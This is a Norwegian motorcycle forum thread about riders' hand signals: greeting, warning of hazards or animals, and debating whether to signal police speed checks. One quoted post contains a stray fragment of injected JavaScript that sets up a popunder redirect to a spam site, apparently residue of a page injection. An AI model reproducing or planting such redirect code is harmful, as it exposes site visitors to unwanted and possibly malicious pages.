Håndsignaler

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
JohnnyTh
Innlegg: 3439
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Håndsignaler

Legg inn av JohnnyTh »

Hvis disse førerne er så ruset at de ikke klarer å holde fartsgrensene så skulle en ikke tro de ble så mye flinkere til å følge fartsgrensene etter å ha sett et par blink. Jeg vil tro at hvis man kjører i rus så vil de fleste kjøre så lovlydig som mulig for å unngå politiets oppmerksomhet. Hvis man ikke er så ruset at man ikke kan tenke sånn.

Selv er det helt topp nor noen varsler meg, enten med blink eller håndsignal. Det gjør at jeg er litt mer oppmerksom på farten en stund og kanskje jeg slipper å bli tatt i å kjøre 83km/t i ei 80 sone.
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

45316
Innlegg: 920
Registrert: 24 apr 2013, 12:58
Motorsykkelen din: ZZR600 98mod

Re: Håndsignaler

Legg inn av 45316 »

JohnnyTh skrev:Hvis disse førerne er så ruset at de ikke klarer å holde fartsgrensene så skulle en ikke tro de ble så mye flinkere til å følge fartsgrensene etter å ha sett et par blink. Jeg vil tro at hvis man kjører i rus så vil de fleste kjøre så lovlydig som mulig for å unngå politiets oppmerksomhet. Hvis man ikke er så ruset at man ikke kan tenke sånn.

Selv er det helt topp nor noen varsler meg, enten med blink eller håndsignal. Det gjør at jeg er litt mer oppmerksom på farten en stund og kanskje jeg slipper å bli tatt i å kjøre 83km/t i ei 80 sone.
Hva skjer når det blir blinket? Jo de kriminelle/ruskjørerne snur før kontrollen, får ikke kontrollert de i det hele tatt. Det er så klart fint at du unngår et forelegg på 600kr, men....


Sent from my iPhone using Tapatalk

Brukeravatar
Snekker.edvin
Innlegg: 494
Registrert: 30 des 2017, 23:30
Motorsykkelen din: Yamaha TDM 850

Re: Håndsignaler

Legg inn av Snekker.edvin »

Snikkeren skrev: 15 aug 2010, 02:53 Så det var en tråd om temaet, men den var sporet såppass av mot gule vester (fysj), at jeg lager en ny en.

Kan være greit for nye, ferske, nyferske osv. å vite hvordan man skal hilse, og varsle når man kjører mc.

Her er mine tanker rundt det:

1. Hilse på vanlig måte (med hånden over styret) hver gang jeg treffer en mc. :vs Enkelte mener man kun skal hilse hvis det er klar bane (ingen fartskontroll), men å stole på at det er klar bane når noen har hilst på deg er ikke så smart. Man vet aldri hvor lenge det er siden den andre motorsyklisten svingte ut på veien.

2. Dersom det er fartskontroll varsles dette med en flat hånd mot bakken med en pumpe bevegelse: som i ta det med ro. Kan også brukes ved grus i veien, olje eller huller.

3. Tommel opp: ingen fartskontroll på en god stund. Ikke et must, men veldig kjekt, spesielt hvis man nærmer seg en ferge, og har dårlig tid.


Dette er vel de mest brukte håndsignalene.
Nr. 2 må ikke misbrukes. Man gir ikke signalet hvis man mener at motgående mc kjører for fort.

Faren ved misbruk er den såkalte ulv ulv effekten.

Her er en videodemonstrasjon av noen av signalene. Den med å ta seg til hodet er ikke utbredt i Norge.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Lufter opp den gamle diskusjon. Ganske nyttig å vite.

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Håndsignaler

Legg inn av Bjerknez »

Det var frisk satsing å løfte opp en tråd som har rukket å bli hele 11 år gammel! Bra jobba :twothumbs:

Altså 11 år siden det siterte innlegget ble skrevet.

Online
Brukeravatar
AJ
Administrator
Innlegg: 37877
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Håndsignaler

Legg inn av AJ »

Bjerknez skrev: 16 des 2020, 15:23 Det var frisk satsing å løfte opp en tråd som har rukket å bli hele 11 år gammel! Bra jobba :twothumbs:

Altså 11 år siden det siterte innlegget ble skrevet.
Alder på tråden har ingenting å si så lenge temaet fortsatt er relevant for noen, ja, til og med ganske mange, kanskje?
Ikke minst sett i lys av at det er blitt en god del nybakte motorsyklister her i landet, skal man dømme etter MC-salget de siste årene.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Håndsignaler

Legg inn av Bjerknez »

Når det er sagt...

Jeg mener at varsling av kontroll er en god greie, men stoler ikke på at alle gjør dette. Dessuten er det ikke lov og politiet har den siste tiden gitt bøter til folk som varsler om kontroller ved å blinke med lysene etc. Det blir EGENTLIG også litt feil... på en måte, men deb barbariske siden av meg tenker at dette må få være en greie mellom oss motorsyklister.

Men det er jo enda bedre og holde hånden på hodet (hjelmen) ved varsling av kontroller. Da kan man lettere forklare tegngivningen med at man skulle dytte på seg hjelmen etc, enn å lage pumpebevegelser som helt klart er mer avslørende.

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Håndsignaler

Legg inn av Bjerknez »

AJ skrev: 16 des 2020, 15:29
Bjerknez skrev: 16 des 2020, 15:23 Det var frisk satsing å løfte opp en tråd som har rukket å bli hele 11 år gammel! Bra jobba :twothumbs:

Altså 11 år siden det siterte innlegget ble skrevet.
Alder på tråden har ingenting å si så lenge temaet fortsatt er relevant for noen, ja, til og med ganske mange, kanskje?
Ikke minst sett i lys av at det er blitt en god del nybakte motorsyklister her i landet, skal man dømme etter MC-salget de siste årene.
Neida, ikke noe problem for min del. Var bare litt morsomt at en 11 år gamel tråd dukket opp igjen :)

Brukeravatar
rolf-arne
Innlegg: 2137
Registrert: 20 aug 2018, 20:28
Motorsykkelen din: Pan European 1100 -1995, CBX 1000
Sted: Nordvågen,Nordkapp
Kontakt:

Re: Håndsignaler

Legg inn av rolf-arne »

Må si at jeg reagerer litt på signalet om å dempe farta , selv tar jeg det for - og bruker det som - "det er en fare bak meg som krever oppmerksomhet eller lavere fart" og for mc- synes jeg dette er viktigere enn mye annet - du kan på denne måten varsle "grus bak svingen" , "idiot bak svingen"(parkert tulling) ,"hull i veibanen" alltså årsaker/hendelser som utgjør en fare for to-hjulingen og oss som sitter på.

Kontroll kunne jeg tenkt meg å varsle med "saftblanderen" , men det tror jeg ville begrense seg til slik som fellesturer o lign.

På sommeren her hjemme så blinker vi med lysan om det finnes reinsdyr nær veien eller rar-turist på veien, hva som er værst er ikke godt å si :lol . Og om du får anmodning om å senke farta fra meg , så er det en jævla god grunn for det - som oftest så er det dyr (reinsdyr) på uoversiktlig sted.
Nyskjærrig - lurer på hva som er bak neste sving - når det er fastslått - så blir man rastlaus og lurer på hva som er bak den neste -- å sånn går livet - av og til tar nyskjærrigheta pause og da kan man avspore ei stund - til å bli kjent med folk og gjøre betjentskaper om til vennskap -- og ikke minst kan kroppen ha sine gode stunder og da gjelder det å enten nyte livet eller få noe gjort. Det siste skyves det ofte på, skal man være ærlig..

Online
Brukeravatar
AJ
Administrator
Innlegg: 37877
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Håndsignaler

Legg inn av AJ »

Grus, sauer, beitekyr og andre dyr i veibanen, som ofte forekommer på en del veier het jeg bor, er gode grunner for å bruke demperhåndbevegelser til møtende motorsyklister.

Samme bevegelse til møtende MC'er om fartskontroller? Kommer helt an på, må jeg bare erkjenne. Kommer det et råskinn som åpenbart kjører langt ovet fartsgrensa, lar jeg være. Slike folk gjør seg vel fortjent til å bli tatt.
Selv om jeg ikke er et dydsmønster selv når det gjelder overholdelse av fartsgrensene overalt og hele tiden...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

cannon
Innlegg: 2264
Registrert: 13 feb 2011, 15:43
Motorsykkelen din: Honda cbr929rr 2000, Yamaha YZF R1 2006

Re: Håndsignaler

Legg inn av cannon »

AJ skrev: 16 des 2020, 18:19
Samme bevegelse til møtende MC'er om fartskontroller? Kommer helt an på, må jeg bare erkjenne. Kommer det et råskinn som åpenbart kjører langt ovet fartsgrensa, lar jeg være. Slike folk gjør seg vel fortjent til å bli tatt.
Selv om jeg ikke er et dydsmønster selv når det gjelder overholdelse av fartsgrensene overalt og hele tiden...
"Vi er alle like, men noen er likere enn andre" ....husker ikke hvem som skrev det, men det gjelder åpenbart fortsatt.
Jeg hilser på alle, og varsler alle om fare eller kontroll. Med alle unntak og individuelle vurderinger av hvordan varsling skal praktiseres, og hvem som fortjener bli varslet, så er det vel like greit å slutte. Bedre å klamre seg til holkene og gi jernet.....;-)

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Håndsignaler

Legg inn av Bjerknez »

Jeg synes egentlig det er innafor og varsle kontroller, selv om jeg skal inrømme at jeg sliter litt med argumentene for dette. Men hvorfor er man egentlig villig til å varsle en annen samt risikere bøter selv for selve varslingen? Den varslingsboten tror jeg neppe motorsyklisten som ble reddet fra bøter og eller førerkortinndragelse vil betale for deg uansett.

Når det kommer til penger er vi nok alle like. Alle vil være en god samaritan, men ingen vil rote bort pengene sine.

cannon
Innlegg: 2264
Registrert: 13 feb 2011, 15:43
Motorsykkelen din: Honda cbr929rr 2000, Yamaha YZF R1 2006

Re: Håndsignaler

Legg inn av cannon »

Bjerknez skrev: 17 des 2020, 04:51 Jeg synes egentlig det er innafor og varsle kontroller, selv om jeg skal inrømme at jeg sliter litt med argumentene for dette. Men hvorfor er man egentlig villig til å varsle en annen samt risikere bøter selv for selve varslingen? Den varslingsboten tror jeg neppe motorsyklisten som ble reddet fra bøter og eller førerkortinndragelse vil betale for deg uansett.

Når det kommer til penger er vi nok alle like. Alle vil være en god samaritan, men ingen vil rote bort pengene sine.
Nei B. Dette handler om at noen vurderer sin egen for-fort-kjøring til å være innafor, og samtidig vurderes andres for-fort-kjøring til å være uakseptabel.
Andre nekter konsekvent å varsle fordi den møtende kan være rusa.....forstå det den som vil/kan....

Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Håndsignaler

Legg inn av Bjerknez »

cannon skrev: 17 des 2020, 07:22
Bjerknez skrev: 17 des 2020, 04:51 Jeg synes egentlig det er innafor og varsle kontroller, selv om jeg skal inrømme at jeg sliter litt med argumentene for dette. Men hvorfor er man egentlig villig til å varsle en annen samt risikere bøter selv for selve varslingen? Den varslingsboten tror jeg neppe motorsyklisten som ble reddet fra bøter og eller førerkortinndragelse vil betale for deg uansett.

Når det kommer til penger er vi nok alle like. Alle vil være en god samaritan, men ingen vil rote bort pengene sine.
Nei B. Dette handler om at noen vurderer sin egen for-fort-kjøring til å være innafor, og samtidig vurderes andres for-fort-kjøring til å være uakseptabel.
Andre nekter konsekvent å varsle fordi den møtende kan være rusa.....forstå det den som vil/kan....
Jeg vurderer ikke egen forfort kjøring til å være innafor. For det er den jo ikke. Men man vil jo ha i pose og sekk. Man vil jo kjøre litt "aktivt" samt bli varslet hvis det er kontroll. Egentlig heller jeg mest mot at dette med varsling av kontroller er en uting. Men samtidig velger jeg å gjøre det... Forstå det den som kan... :scratch

45316
Innlegg: 920
Registrert: 24 apr 2013, 12:58
Motorsykkelen din: ZZR600 98mod

Re: Håndsignaler

Legg inn av 45316 »

Det er ingen egen lovhjemmel såvidt meg bekjent som omhandler varsling av kontroll. De som har fått forenklet forelegg for dette har fått det for ulovlig lysbruk.

Sent fra min SM-G955F via Tapatalk



Brukeravatar
Bjerknez
Innlegg: 22912
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Håndsignaler

Legg inn av Bjerknez »

45316 skrev: 17 des 2020, 08:20 Det er ingen egen lovhjemmel såvidt meg bekjent som omhandler varsling av kontroll. De som har fått forenklet forelegg for dette har fått det for ulovlig lysbruk.

Sent fra min SM-G955F via Tapatalk
https://www.vol.no/nyheter/notiser/2019 ... 437711.ece

Svar